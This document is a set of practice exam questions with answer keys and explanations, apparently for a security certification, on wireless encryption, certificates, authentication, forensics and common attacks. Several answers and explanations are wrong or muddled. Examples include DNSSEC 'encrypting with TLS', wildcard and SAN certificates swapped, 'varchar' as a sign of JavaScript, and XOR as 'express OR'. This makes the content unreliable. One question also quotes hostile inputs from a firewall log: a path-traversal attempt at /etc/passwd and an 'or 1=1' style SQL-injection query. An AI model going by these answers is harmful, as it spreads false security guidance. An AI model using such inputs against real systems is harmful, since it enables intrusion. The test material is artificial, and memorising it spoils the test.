Concept: Backdoor viruses can come in through email. They cannot install themselves; this is done by the users unwittingly installing a program. Once installed, the virus may prevent your programs from running.

  1. You are a security administrator and need to set up a new wireless access point so that it is not backward compatible with legacy systems, as these may be vulnerable to attack, and it must be the strongest encryption that you can use. Which is the BEST solution that meets your needs?

A. WPA2 PSK

B. WPA TKIP

C. WPA2 TKIP

D. WPA2 CCMP

Answer: D

Concept: WPA2 CCMP uses AES, which is the strongest wireless encryption and is not backward compatible.

Wrong answers:

A. WPA2 PSK is for home users, where the wireless router password is used to connect to the wireless network

B. WPA TKIP is backward compatible

C. WPA2 TKIP is the strongest backward compatible

  1. Which of the following commands can be used to create a buffer-overflow? Choose all that apply:

A. var char

B. strcpy

C. var data

D. strcat

Answers: B and D

Concept: The strcpy and strcat are used to copy and concatenate strings to a char array, and both can cause buffer-overflow, depending on the number of characters allowed.

Wrong answers:

A. The var char sets the variable length of characters

C. The var data sets the data type to be used in Java

  1. James has raised a ticket with the IT help desk. He has been tampering with the settings on his computer and he can no longer access the internet. The help desk technicians have checked the configuration on his desktop and the settings are the same as everyone else's. Suddenly, three other people have also reported that they also cannot connect to the internet. Which network device should be checked first?

A. Switch

B. Router

C. Hub

D. Repeater

Answer: B

Concept: A router gives you access to the internet; on a computer, it is known as the default gateway.

Wrong answers:

A. A switch joins resources on an internal network

C. A hub is an internal device that is slower than a switch, as it broadcasts traffic

D. A repeater is a device that extends cables beyond their length

  1. Which of the following is a secure wireless protocol that uses TLS?

A. NTLM

B. PAP

C. EAP

D. AES

Answer: C

Concept: EAP-TLS is used for wireless encryption.

Wrong answers:

A. NTLM is a legacy Windows protocol

B. PAP stores passwords in clear text

D. AES involves symmetric encryption and is commonly used with L2TP/IPSec

  1. You are the security administrator for a multinational corporation, and the development team have asked for your advice as to how best to prevent SQL-injection, integer-overflow, and buffer-overflow attacks. Which of the following should you advise them to use?

A. Input validation

B. A host-based firewall with advanced security

C. strcpy

D. Hashing

Answer: A

Concept: Input validation controls the format and characters of data input and will prevent SQL-injection, buffer- overflow, and integer-overflow attacks.

Wrong answers:

B. A host-based firewall protects a desktop or laptop from attack

C. The strcpy can cause buffer-overflow if the string of data is larger than the maximum number of characters used in a data field

D. Hashing only confirms data integrity; it has no control over the input used

  1. Your company is opening up a new data center in Galway, Ireland. A server farm has been installed there and now a construction company have come in to put a six-foot mantrap in the entrance. What are the two main reasons why this mantrap has been installed?

A. To prevent theft

B. To prevent tailgating

C. To prevent unauthorized personnel gaining access to the data center

D. To allow faster access to the facility

Answer: B and C

Concept: A mantrap provides a safe and controlled environment in the data center as it allows you to control access.

Wrong answers:

A. Although this will be prevented, it is not the main reason; a mantrap's main purpose is to stop or control people

D. A mantrap will slow access to the data center

  1. Which of the following devices can prevent unauthorized access to the network and prevent attacks from unknown sources?

A. Router

B. Load balancer

C. Web security gateway

D. UTM

Answer: D

Concept: A UTM is a firewall that can prevent unauthorized network access. It can also perform URL filtering, content filtering, and malware inspection.

Wrong answers:

A. A router can prevent access to the network based on the port, protocol, or IP address

B. A load balancer controls the volume of web traffic coming into your web server

C. A web security gateway prevents attacks on web servers

  1. Internet of Things (IoT) is a concept that has recently taken off. Can you identify which of the following devices fall under this category? Select all that apply:

A. ATM

B. Banking system

C. Smart TV

D. Refrigerator

E. Router

F. Wearable technology

Answer: A, C, D, and F

Concept: IoT involves small devices such as household appliances, wearable technology, and ATMs.

Wrong answers:

B. A banking system is not a small device; it is an IT system

E. A router is used to route packets and join networks together

  1. Which feature of DNS will help balance a load without needing to install a network load balancer, or, when coupled with a load balancer, makes it more dynamic?

A. DNS CNAME

B. DNSSEC

C. DNS round robin

D. DNS SRV records

Answer: C

Concept: A DNS round robin is a redundancy used by DNS to ensure that a server is always available, even when suffers hardware failure. If you have three records for a web server, it will go from the first to the second to the third record and rotate back to the first again.

Wrong answers:

A. A CNAME is an alias; a shortened name for a host with an extremely long hostname

B. DNSSEC creates RRSIG records as it encrypts DNS traffic with TLS

D. SRV records help you find services such as domain controllers or global catalog servers

  1. What is the benefit of certificate pinning?

A. It prevents a certificate signing request from a non-administrator

B. It is used by a web server, and it bypasses the CRL for faster authentication

C. It stops people from spoofing, issuing certificates, or compromising your CA

D. It is used for cross certification between two separate root CAs

Answer: C

Concept: Certificate pinning prevents people from compromising your CA and issuing fraudulent certificates.

Wrong answers:

A. A non-administrator can submit a CSR to obtain a new certificate

B. This is known as certificate stapling

D. This is known as a bridge trust model or a trust model

  1. An auditor has just finished a risk assessment of the company, and he has recommended that we need to mitigate some of our risks. Which of the following are examples of risk mitigation?

A. Turning off host-based firewalls on laptops

B. Installing antivirus software on a new laptop

C. Insuring your car against fire and theft

D. Outsourcing your IT to another company

E. Deciding not to jump into the Grand Canyon

Answer: B

Concept: Risk mitigation involves reducing the risk of an attack or event. These are basically technical controls.

Wrong answers:

A. This increases the risk, as it leaves your laptop vulnerable to attack

C. This is risk transference

D. This also is risk transference

E. This is risk avoidance, as it is deemed too risky

  1. A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following will you choose?

A. L2TP/IPSec

B. SSL VPN

C. PPTP VPN

D. IKEv2 VPN

Answer: B

Concept: SSL VPN is legacy that uses SSL certificates. SSL has been replaced by TLS as it is more secure.

  1. You are the Active Directory administrator and you have been training new interns on the Kerberos ticket granting session. One of the interns has asked about the relationship between a service ticket and session ticket used by Kerberos authentication. Which of the following is the best description?

A. The user exchanges their service ticket with the server's session ticket for mutual authentication and single sign on

B. The service key is unencrypted and is matched with the value in the session ticket

C. The user shows the server their session ticket and the server sends him a service ticket

D. The user shows the server their service ticket and the server sends him a session ticket to keep

Answer: A

Concept: Kerberos uses tickets for authentication, mutual authentication, and Single Sign On (SSO). Service and session tickets are exchanged for mutual authentication. The service ticket is encrypted.

  1. Your company has a guest wireless network that can be used by visitors during the day, the sales staff in the evening, and the customer service staff at lunchtime.

They set up a captive portal that fulfills the following criteria:

How will you set up your captive portal? Select three answers; each answer provides part of the solution:

A. WEP 40-bit key

B. WPA2 TKIP

C. WPA-TKIP

D. Open-system authentication

E. WPA2 CCMP

F. WPS

Answer: D, E, and F

Concept: We use open-system authentication for the guest network as it requires no authentication. WPS is used for sales staff as they just need to push a button. Customer-services staff use WPA2 CCMP as it uses AES and is the highest level of WPA.

Wrong answers:

A. WEP should not be used, as it is too weak

B. WPA2 TKIP is used for backward compatibility, and is not as strong as WPA2 CCMP

C. A weaker version of B

  1. You are a security administrator, and the IT team has been using RSA for the encryption of all of their data, but has found that it is very slow. Which of the following should the security administrator recommend to improve the speed of encryption?

A. Asymmetric encryption using DES 

B. Asymmetric encryption using Diffie Helman

C. Symmetric encryption

D. Running a vulnerability scan to find a better solution

Answer: C 

Concept: Symmetric data is used to encrypt large amounts of data.

Wrong answers:

A. Totally wrong as DES is not asymmetric

B. Diffie Hellman does not encrypt; it only creates a secure channel

D. Vulnerability scans are for missing patches, not encryption

  1. Robert, who is an intern, has been assigned to the security team. A user has called him to ask who signs the X509 certificates. Which one of the following should Robert give as an answer?

A. CRL

B. Key escrow

C. CSR

D. CA

Answer: D 

Concept: The CA signs the X509 certificates.

Wrong answers:

A. The CRL checks the certificate validity

B. The key escrow stores private keys for third parties

C. The CSR is the process of requesting a new certificate

Mock Exam 2

  1. You are the security administrator for a large multinational corporation, and you have used a black box penetration tester to find vulnerabilities in your company and exploit them as far you can. During the penetration test, it was found that there were some vulnerabilities in your Windows 10 desktop operating system. There were no vulnerabilities in any of your Linux or Unix systems. Which of the following BEST describes why the penetration tester was successful with the Windows 10 machines, but not with the Linux or Unix machines?

A. Linux and Unix are more secure than Windows 10

B. The penetration tester did not attempt to exploit the Linux/Unix machines

C. The Linux and Unix operating systems never have any vulnerabilities

D. The operating systems' attack vectors are very different

Answer: D

Concept: Different operating systems have different structures, so the attack vectors and the paths taken to attack them are different.

Wrong answers:

A. Not a proven fact—red herring

B. The penetration tests did attempt the exploit—that is why they had negative results

C. All operating systems suffer from vulnerabilities at one time or another

  1. You are a security administrator and you wish to implement an encrypted method of authentication for your wireless network. Which of the following protocols is the MOST secure for your wireless network?

A. PAP

B. WPA2-PSK

C. EAP-TLS

D. PEAP

Answer: C

Concept: EAP-TLS is a secure wireless authentication protocol, as it is uses certificates. It is the most secure EAP standard.

Wrong answers:

A. PAP shows the passwords in clear text and is used by VPN, not wireless networks

B. WPA2-PSK uses a wireless router password therefore, it is not secure

D. PEAP encrypts EAP packets for secure wireless authentication, but it is not as secure as EAP-TLS

  1. You are designing the network topology for a new company that is rapidly expanding from a one-premise company with 20 users to a medium-sized company with 300 users. The company tells you that it was subject to a DDoS attack last year that took the company down for over a day. In your network design, they don't want to implement a DMZ; therefore, the traffic will be coming directly from the internet. How do you propose to BEST mitigate against future DDoS attacks? Select two answers from the following list; each forms part of the solution:

A. Install a stateless firewall on the edge of your network to prevent incoming traffic

B. Install a stateful firewall on the edge of your network to prevent incoming traffic

C. Install an NIDS in your network as an additional layer of protection

D. Install an NIPS in your network as an additional layer of protection

E. Install an inline NIPS in your network as an additional layer of protection

Answer: B and E

Concept: A stateful firewall on the edge of your network can prevent a DDoS attack as it inspects the traffic, including the verbs. An inline NIPS will ensure that all network traffic coming from the firewall will go through it and be inspected thoroughly.

Wrong answers:

A. A stateless firewall is a basic firewall that will prevent unauthorized access, but does not really inspect the traffic thoroughly

C. An NIDS cannot be an additional layer of protection, as it just detects changes in traffic patterns and cannot prevent the attacks

D. Although installing an NIPS behind the firewall is a good idea, the inline NIPS is a much better solution, as all of the traffic passes through it

  1. You work on the cyber security team of a large multinational corporation, and you have been alerted to an attack on the web server inside your DMZ that is used for selling your products on the internet. You can see by running netstat that you have an unknown active connection. What should be the first step you take when investigating this incident?

A. Isolate the web server by disconnecting it from the network to prevent further damage

B. Disconnect all external active connections to ensure that the attack is stopped

C. Run a packet sniffer to capture the network traffic and identify the attacker

D. Take a screenshot of the damage done to the website and reporting it to the police

Answer: C

Concept: The first stage in any attack is to capture the volatile evidence. In this incident you would capture the network traffic to identify the source of the attack.

Wrong answers:

A. Disconnecting the attack will prevent further damage, but will not identify the attacker and prevent it from happening again

B. Again, this option will not identify the attacker, but may instead stop legitimate customers

D. A screenshot may not show the real damage being done, and will not identify the attacker

  1. I need to purchase a certificate that I can install on five mail servers. Which one should I purchase?

A. PEM certificate

B. Wildcard certificate

C. Subject Alternate Name (SAN) certificate

D. Root certificate

Answer: B

Concept: A wildcard certificate can be used on multiple servers in the same domain.

Wrong answers:

A. PEM is a base64 format

C. A SAN certificate can be used in servers in different domains

D. A root certificate can only be used by a CA

  1. You are the manager of a large IT company, and it is your duty to authorize administrative controls. Which of the following are actions that you would NORMALLY authorize? Select all that apply:

A. Collecting an ID badge

B. Creating an IT security policy

C. Purchasing a cable lock

D. Creating a new firewall rule

Answer: A and B

Concept: Writing policies, filling out forms, and anything to do with applying for ID badges are administrative controls.

Wrong answers:

C. A cable lock is a physical control

D. A firewall rule is a technical control to mitigate risk

  1. You are the operational manager for a financial company that has just suffered a disaster. Which of the following sites will you choose to be fully operational in the least amount of time?

A. Cold site

B. Warm site

C. Hot site

D. Campus site

Answer: C

Concept: The hot site should be up and running with data less than one hour old.

Wrong answers: 

A. The cold site is the hardest site to get up and running, and it only has power and water

B. A warm site has noncritical data, and the data is about a day old

D. This is a red herring, and has nothing to do with disaster recovery

  1. The serious crimes agency has just taken control of a laptop belonging to a well-known criminal that they have been trying to track down for the last 20 years. They want to ensure that everything is done by the book and no errors are made. What is the first step in their forensic investigation, prior to starting the chain of custody?

A. Making a system image of the laptop

B. Placing the laptop in a polythene bag and seal it

C. Hashing the data so that data integrity is assured

D. Asking for proof of ownership of the laptop

Answer: A

Concept: The first step is to create a system image; or, if it is a hard drive, create a forensic copy.

Wrong answers:

B. This is the second step

C. This is one of the steps when we start to investigate the contents of the laptop

D. This is not relevant

  1. If an attacker is looking for information about the software versions that you use on your network, which of the following tools could they use? Select all that apply:

A. Protocol analyzer

B. Port scanner

C. Network mapper

D. Baseline analyzer

Answer: A and C

Concept: A Network mapper (Nmap) can identify new hosts on the network, identify what services are running, and identify what operating systems are installed. A protocol analyzer can tell what operating systems run on network hosts. This is sometimes called a packet sniffer.

Wrong answers:

B. A port scanner only tells you which ports are open

D. A baseline analyzer is a vulnerability scanner, and tells you about missing patches

  1. Footage of people relaxing in their homes started appearing on the internet without the knowledge of the people being filmed. The people being filmed were warned by relatives and coworkers, resulting in an inquiry being launched by the police. Initial evidence reported a that the victims had recently purchased IoT devices, such as health monitors, baby monitors, smart TVs, and refrigerators. Which of the following best describes why the attacks were successful?

A. The devices' default configurations had not been changed

B. The victims' houses had been broken into and hidden cameras were installed

C. The victims' wireless networks were broadcasting beyond the boundaries of their homes

D. The manufacturers of the devices installed hidden devices to allow them to film

Answer: A

Concept: IoT home-based automated devices should have the default configurations of the username and password changed.

Wrong answers:

B. This would be very unlikely for so many people

C. This may be a possibility, but is unlikely to be the main reason

D. This would not happen, or the manufacturer would lose their market share

  1. You are the network administrator for an IT training company that has over 20 training rooms that are all networked together in their Miami office. Your corporate admin team could not access the internet last week as they were getting their IP settings from one of the training room's DHCP servers. The training manager has asked you to separate the corporate admin machines into their own network with a different IP range from the training rooms. What is the most secure way of implementing this? Select the best option from the following list:

A. Create a VLAN on the switch and put the corporate admin team in the VLAN

B. Install a router in the LAN and place the corporate admin team in the new subnet

C. Create an NAT from the firewall and put the corporate machines in that network

D. Install a proxy server

Answer: C

Concept: A NAT hides the internal network from external resources and will separate the training machines from the corporate admin machines.

Wrong answers:

A. Putting a VLAN on the switch will segment the two networks, but it's not the best option

B. Installing a router creates a subnet and would also segment the two entities, but this is not the best option either

D. A proxy caches web pages and also filters traffic to and from the internet

  1. Your organization has many different ways of connecting to your network, ranging from VPN and RAS to 802.1x authentication switches. You need to implement a centrally managed authentication system that will allow for long periods of access. Select the two most suitable methods of authentication:

A. PAP

B. TACACS+

C. NTLM

D. RADIUS

Answer: B and D

Concept: AAA Server are used for centralized authentication as they provide authentication, authorization, and accounting, where they can record all log-ins and log-outs in a database.

Wrong answers:

A. PAP is a weak authentication system where passwords are shown in clear text

C. NTLM is a weak authentication protocol that is susceptible to pass-the-hash attacks

  1. From a security perspective, what is the MAJOR benefit of using imaging technologies such as Microsoft WDS or Symantec Ghost to image desktops and laptops that are being rolled out?

A. It provides a consistent baseline for all new machines

B. It ensures that all machines are patched

C. It reduces the number of vulnerabilities

D. It allows a non-technical person to roll out the images

Answer: A

Concept: When you build an image, all of the applications will have the same settings and updates and therefore will be consistent. A baseline consists of the applications that are installed at the current time.

Wrong answers:

B. Updates come out almost every week, so you will still need to patch an image, especially if it was taken a month or two ago

C. Vulnerabilities are discovered on a frequent basis, therefore this is not true

D. The fact is true, but from a security point of view it could pose a risk

  1. A company that is allowing people to access their internet application wants the people who log into the application to use an account managed by someone else. An example of this is a user accessing their Facebook account with a technology called Open ID Connect. Which of the following protocols is this based on? Select the BEST choice:

A. Kerberos

B. SAML

C. OAuth 2.0

D. Federation services

Answer: C

Concept: OAuth 2.0 is the industry-standard protocol for authorization. It is used by Open ID Connect, where people can be authenticated using their Facebook or Google account.

Wrong answers:

A. Kerberos is used only in Microsoft Active Directory

B. SAML is an XML-based authentication used in federation services

D. Federation services is third-party-to-third-party authentication that uses SAML, an XML-based authentication protocol

  1. You are the security administrator for a medium-sized company that needs to enforce a much stricter password policy via Group Policy. The aims of this policy are to do the following:

Prevent using the same password within 12 password changes

Select the following options that you will need to use to fulfill all of these goals:

A. Enforce password history

B. Minimum password length

C. Passwords must meet complexity requirements

D. Minimum password age

E. Maximum password length

Answers: A and C

Concept: The password history is the number of passwords that you need to remember before you can reuse them. Password complexity requires users to use three of the four following characters in the password: lower case, higher case, number, and special characters not used in programming. A minimum password age set to 1 means that you can change the password only once a day, preventing password rotation until you get back to the original password.

Wrong answers:

B. Password length was a requirement, but the longer the password length, the longer it will take a brute force attack to crack

E. In a group policy, there is no option for maximum password length

  1. You provide a service for people who have recently fulfilled their contract with their mobile phone provider to unlock their phone and then install third-party applications on it. They will then no longer be tied to using the mobile phone vendor's app store. Which of the following techniques will you use to achieve this? Select all that apply:

A. Tethering

B. Sideloading

C. Slipstreaming

D. Jailbreaking or rooting

E. Degaussing

Answers: B and D

Concept: Sideloading involves loading third-party applications onto an unlocked mobile phone. Jailbreaking (iOS), or rooting (Android), is where the phone has been unlocked, removing the vendor's restrictions on the mobile phone.

Wrong answers:

A. Tethering involves connecting your phone to a laptop to give the laptop internet access

C. Slipstreaming is a technique for installing drivers into an .iso file

E. Degaussing involves passing a charge over a hard drive to erase data

  1. You are the security administrator of a multinational company that has recently prevented brute-force attacks by using account lockout settings with a low value using group policy. The CEO of the company has now dictated that the company will no longer use account lockout settings as he read an article about it and got the wrong impression. Facing this dilemma, how can you ensure that you can make it more difficult for brute force to be successful?

A. Obfuscation

B. PBKDF2

C. XOR

D. bcrypt

Answer: B and D

Concept: PBKDF2 and bcrypt are key-stretching algorithms that insert random characters into password hashes, making them longer so that brute-force attacks need more processing and computation resources to crack them.

Wrong answers:

A. Obfuscation makes code obscure so that if someone steals your code, they cannot make sense of it

C. XOR (express OR) can be used to encrypt binary numbers

  1. You want to join a wireless network using a password. Which of the following wireless features would be most appropriate to achieve this objective?

A. WPA2-Enterprise

B. WPA2-TKIP

C. WPS

D. WPA2-PSK

E. WPA2-CCMP

Answer: D

Concept: PSK uses the WAP password to join the network.

Wrong answers: 

A. WPA2-Enterprise uses 802.1x with RADIUS for authentication

B. WPA2-TKIP is backward compatible with legacy devices

C. WPS pushes a button to access the network

E. WPA2-CCMP is the strongest encryption, as it uses AES

  1. What is the main purpose of a Network Intrusion Detection System (NIDS)? Select the MOST appropriate option:

A. Identifying vulnerabilities

B. Identifying new network hosts

C. Identifying viruses

D. Identifying new web servers

Answer: B

Concept: NIDS identifies changes to the network and the network traffic.

Wrong answers:

A. This is the job of a vulnerability scanner

C. This is the job of a virus scanner

D. Web servers are not based in the LAN; normally, they are based in the DMZ

  1. A web server was the victim of an integer-overflow attack. How could this be prevented in the future?

A. Install a proxy server

B. Install SQL-injection

C. Input validation on forms

D. Install a web application firewall

Answer: C

Concept: Input validation prevents buffer-overflow attacks, integer-overflow attacks, and SQL-injection by restricting the input to a certain format.

Wrong answers:

A. A proxy server is used for web page caching and URL and content filtering

B. SQL-injection is a form of attack where the phrase 1 = 1 is used in a script

D. A web application firewall is used to protect web servers and their applications

  1. You have recently set up a new virtual network with over 1,000 guest machines. One of the hosts is running out of resources, such as memory and disk space. Which of the following best describes what is happening?

A. Virtual machine escape

B. End of system lifespan

C. System sprawl

D. Poor setup

Answer: C

Concept: System sprawl over-utilizes resources. This means that the system has started to run out of resources.

Wrong answers:

A. VM escape is where an attacker uses a virtual machine so that they can attack the host

B. This is where a vendor no longer supports an application

D. This is where the configuration is not set properly

  1. You are the system administrator for a multinational company that wants to implement two-factor authentication. At present, you are using facial recognition as the method of access. Which of the following would allow you to achieve two-factor authentication? Select all that apply:

A. Palm reader

B. Signature verification

C. Thumb scanner

D. Gait

E. Iris scanner

Answer: B and D

Concept: Facial recognition is something you are for authentication. B and D are both something you do—you have a unique signature and your gait is how you walk.

Wrong answers:

A, C, and E all come under the something you are category.

  1. The security auditor has just visited your company and is recommending that change management to reduce the risk from the unknown vulnerabilities of any new software introduced into the company. What will the auditor recommend for reducing the risk when you first evaluate the software? Select the BEST practices to adopt from the following list:

A. Jailbreaking

B. Sandboxing

C. Bluesnarfing

D. Chroot jail

E. Fuzzing

Answer: B and D

Concept: Sandboxing and chroot jail allow you to isolate an application inside a virtual guest machine.

A. This is the removal of the restriction that apple set on an iOS device

C. This is stealing contacts from a mobile device

E. This is putting random characters into an application

  1. You are the security administrator for a multinational corporation. You recently detected and thwarted an attack on your network when someone hacked into your network and took full control of one of the hosts. What type of attack best describes the attack you stopped?

A. Man-in-the-middle attack

B. Replay attack

C. Packet filtering

D. Remote exploit

Answer: D

Concept: An exploit looks for vulnerabilities in a system; a remote exploit is someone coming from outside your network.

Wrong answers:

A. A man-in-the-middle attack is an interception attack where messages are changed in real time as they pass between two hosts

B. A replay attack is a man-in-the-middle attack where the messages are replayed at a later date

C. Packet filtering is used by a firewall to stop certain protocols from accessing your network

  1. You are the security administrator for a multinational corporation recently carried out a security audit. Following the audit, you told the server administrators to disable NTLM on all servers. Which of the following best describes why you have taken this action?

A. It will improve the server's performance

B. Prevent a man-in-the-middle attack

C. Prevent a pass-the-hash attack

D. Prevent a POODLE attack

Answer: C

Concept: Disabling NTLM will prevent pass-the-hash attacks.

Wrong answers:

A. This is a red herring; it has nothing to do with performance

B. A man-in-the-middle attack is an interception attack

D. A POODLE attack is a man-in-the-middle attack that targets downgrade browsers—SSL3.0 CBC

  1. The political adviser to the prime minister of the United Kingdom has returned from the two month of summer break that all staff are entitled to. He applied for an immediate transfer to another department, stating that his health is bad and the job was far too intense. When his replacement arrives, they find that during the summer recess, the political adviser shredded all documents relating to a political inquiry that involved their cousin. The police are immediately called in and say that they cannot prosecute the political adviser because of a lack of evidence. What precautions could the House of Parliament security team take to prevent further events such as this happening in the future?

A. Create a change-management document to ensure that the receptionists are more vigilant about people coming in out of hours

B. Enforce time-of-day restrictions so that nobody can access the IT systems during summer breaks

C. Enforce separation of duties to ensure that any document that is destroyed has been witnessed by a second person

D. Enforce mandatory vacations to prevent staff coming in during the recess

Answer: B

Concept: Time-of-day restrictions would have prevented someone accessing the system during the holidays.

Wrong answers:

A. If the staff of the House of Commons are on holiday, then there will be no receptionists present

C. Separation of duties cannot be enforced during a shutdown period

D. Mandatory vacations cannot be enforced when nobody is working

  1. You work in the forensics team of a very large multinational corporation where an attack has happened across three different sites in two different countries. You have been collecting the following log files from these locations:

What is the first action that you need to take when collating these logs?

A. Apply time normalization to these logs

B. Copy them into a worm drive so that they cannot be tampered with

C. Sort out the sequence of events by site

D. Raise chain of custody documentation for these logs

Answer: A

Concept: When collating forensic evidence, it needs to be put in a time sequence. In this case, we use time normalization to put it all in order. If we collect physical evidence from different computers, we use the record time offset to put the data and events in time sequence by using the regional time on the machine.

Wrong answers:

B. Copying into a worm drive will prevent deletion, but not the analysis of data.

C. This could be a first step, but it will not collate the information properly.

D. A chain of custody would be needed once you hand the evidence to someone else, but it is too early at this time for this. A chain of custody records who has handled the evidence.

  1. You are an Active Directory administrator and have been having problems with time synchronization regarding the Kerberos authentication protocols. Consequently, you have now contacted a third party to provide your time synchronization. They use Stratum Network Time Protocol (NTP) servers. What is the MOST secure method of setting up a Stratum server for time synchronization?

A. Having the servers connect to an internal Stratum 1 NTP server

B. Having the servers connect to an internal Stratum 2 NTP server

C. Having the servers connect to an internal Stratum 0 NTP server

D. Having the servers connect to an external Stratum 0 NTP server

Answer: A

Concept: The time server must be internal. The Stratum 1 NTP server connects to the Stratum 0 NTP server, which is the ultimate time source. However, if there is no internal Stratum 1 NTP server, then we will use an internal Stratum 0 NTP server.

Wrong answers:

B. A Stratum 2 server can only connect to a Stratum 1 time server

C. Only use an internal Stratum 0 server when an internal Stratum 1 server is not available

D. The connection to the time server should come from the internal network

  1. You are the network administrator for a company that runs an Active Directory domain environment where the system administrator is failing to keep you updated when new hosts are added to the network. You now decide that you will use your networking tools to do the following:

Which of the following network-based tools provide the information that you require? Select the most likely tools that you are MOST likely to use:

A. Protocol scanner

B. Microsoft baseline analyzer

C. Nmap

D. Penetration testing

Answers: A and C

Concept: Protocol scanners and network mappers can identify new hosts, operating system versions, and services that are running. An NIDS can detect new hosts.

Wrong answers:

B. The Microsoft baseline analyzer is a vulnerability scanner

D. A penetration tester is trying to break into your network

  1. You are working for the serious crimes unit of the United Nations and have been given a laptop to investigate. You need to ensure that the evidence you are investigating has not been tampered with during your investigation. How are you going to prove this to the court when it is time to present your findings? Which of the following techniques will you adopt to BEST prove this? Select all that apply:

A. MD5

B. 3DES

C. SHA1

D. Blowfish

Answer: A and C

Concept: Hashing proves data integrity, and SHA1 and MD5 are both hashing algorithms.

Explanation: When data is collected as part of a chain of custody, all data is hashed by SHA1, MD5, or HMAC. HMAC prior to looking through the data. When you finish the investigation you will run the hash a second time, if the hash matches then the data integrity is confirmed.

Wrong answers:

B and D are both used with encryption, not hashing.

  1. You are the security administrator for a multinational corporation that has an Active Directory domain. What type of attack uses HTML tags with JavaScript inserted between the script> and </script> tags?

A. Cross-site scripting

B. Man-in-the-middle

C. Cross-site forgery attack

D. SQL-injection

Answer: A

Concept: Cross-Site Scripting (XSS) uses HTML tags with JavaScript. JavaScript can be identified by using the word var for variable—for example, varchar or var data.

  1. You are a system administrator working for a multinational company that has a windows domain and is using an active-passive model. Which of the following are the BEST reasons why your company would have adopted this model?

A. It provides vendor diversity

B. It provides much faster disaster recovery

C. It is the best model to use for symmetric encryption

D. It provides availability of your IT systems

Answers: B and D

Concept: Clustering provides availability, and it has a quick failover to the passive host should the active host fail.

Explanation: We would use an active-passive or active-active setup in the failover cluster so that if one node failed, the passive or second server would be up and running within seconds; users would not even be aware of this. This provides both faster disaster recovery and 99.999% availability, otherwise known as the five nines.

Wrong answers:

A. The cluster would come from the same vendor

C. Clustering is about availability—nothing to do with encryption

  1. You are the system administrator for an Active Directory domain and deal with authentication on a daily basis. Which of the following do you use as an authentication method by entering a PIN instead of a password?

A. Smart card

B. Kerberos

C. WPS

D. TOTP

Answer: A

Concept: A smart card uses a PIN.

Wrong answers:

B. Kerberos can be accessed by entering a username and password

C. WPS is accessed by pushing a button to connect to a wireless network

D. TOTP uses a secret key or code

  1. You are the security administrator for a large multinational corporation and you have a meeting with the CEO about the security posture of the company. He wants you to ensure the following are carried out effectively:

Which of the following are the BEST solutions to implement? Select all that apply:

A. Robocopy firewall logs to a worm drive

B. Robocopy firewall logs to a RAID 5 volume

C. Implement usage auditing and reviews

D. Carry out permission audits and reviews every seven days

Answer: A and D

Concept: Storing files on a worm drive prevents deletion. Continuous audits of permissions will help track escalations of privilege.

Wrong answers:

B. Storing data on a RAID volume is a solution for redundancy, but not the deletion of data

C. Account reviews may be quarterly, and so are not the best option

  1. You are the security administrator for a multinational company, and you know that one of your X509 certificates, used in at least 300 desktop machines, has been compromised. What action are you going to take to protect the company, using the LEAST amount of administrative effort?

A. Email the people involved and ask them to delete the X509 from their desktop immediately

B. Carry out certificate pinning to prevent the CA from being compromised

C. Revoke the root CA X509 so it is added to the CRL

D. Revoke the X509 so it is added to the CRL

Answer: D

Concept: Once a certificate has been compromised, it should immediately be revoked so it is added to the CRL.

Wrong answers:

B. Certificate pinning cannot be set up after an event; it is set up to protect the CA against being compromised. This was only a low-level X509 that was compromised

C. There is no reason to revoke the root CA certificate as the certificate authority has not been compromised

  1. You need to install a new wireless access point that should be as secure as possible while also being backward compatibile with legacy wireless systems. Which of the following would help you in this?

A. WPA2 PSK

B. WPA

C. WPA2 CCMP

D. WPA2 TKIP

Answer: D

Concept: WPA2 is the most secure and TKIP is backward compatible.

Wrong answers:

A. WPA2 is used to connect to the wireless access point using a password

B. Although WPA is backward compatible, it is not strong

C. Although WPA2 CCMP is the most secure, it is not backward compatible

  1. You are the capacity planning administrator for a large multinational corporation, and find that Server 1 is running out of disk space. When you monitor its network card, it is at 100% utilization. Which of the following reasons best describes what is happening?

A. There are hardware errors on the server

B. Unauthorized software is being downloaded

C. Event logs are getting full and slowing down the system

D. The disks that were selected were too small

Answer: B

Concept: Unauthorized software takes up disk space and causes high network utilization.

Wrong answers:

A. If there were hardware errors, no download would have happened, and there would not be a decrease in disk space

C. The event logs are text files and will not use up too much space

D. This is not a good choice as the disks that are purchased would be of a reasonable size

  1. You are the security administrator and someone has just tried to attack your web server, which is protected by a web application firewall. When you look into the log files of the web application firewall, two of the rows of the log file have the following two entries:

var data = “<blackbeard> ++ </../etc/passwd>"

Select* from customers where 1=1

Which of the following attacks are most likely to be have been attempted? Select all that apply:

A. Integer-overflow

B. SQL-injection

C. JavaScript

D. Buffer-overflow

Answers: B and C

Concept: An SQL-injection attack uses the phrase 1 = 1. JavaScript is commonly used in XSS attacks and uses the var variable, so if you see var, it is most likely to be JavaScript.

Wrong answers:

A. Integer-overflow is where larger numbers are used than should be used, normally with multiplication

C. Buffer-overflow is where more characters are used than should be. The strcat and strcpy are applications that cause buffer-overflow

  1. Data has previously only been classified as internal data and external data. The company recently added two new classifications: legal and financial. What would be the benefit of these new classifications? Select the best solution for the new data classifications:

A. You need a minimum of three classifications for it to be effective

B. Better data classification

C. Quicker indexing

D. Faster searching

Answer: B

Concept: The more data classifications there are, the easier to classify it will be.

Wrong answers:

A. Data classification has no minimum values

C. Indexing will be slower for more classifications

D. Faster searching is done by reducing the amount of data

  1. You are the security administrator for a multinational corporation based in Miami, and your company has recently suffered a replay attack. After lessons learned, you have decided to use a protocol that uses time stamps and USN to prevent replay attacks. Which of the following protocols is being implemented here? Select the best answer:

A. Federation services

B. EAP-TLS

C. Kerberos

D. RADIUS federation

Answer: C

Concept: Kerberos issues tickets for authentication, and each change has a different Updated Sequence Number (USN) and time stamps.

Wrong answers:

A. Federation services use SAML, an XML-based authentication protocol

B. EAP-TLS uses certificates and is used for wireless authentication

D. The RADIUS federation is a federation that uses wireless as its method of access

  1. Which of the following threat actors would be the most likely to steal a company's R&D data?

A. Organized criminals

B. A competitor

C. A script kiddie

D. A nation state

Answer: B

Concept: The R&D department creates a lot of a company's trade secrets; therefore, a competitor would steal them to beat you to the marketplace.

Wrong answers:

A. Organized crime is most likely to target financial transactions rather than R&D data

C. A script kiddie reuses someone else's scripts

D. A nation state is more interested in attacking foreign governments than R&D data

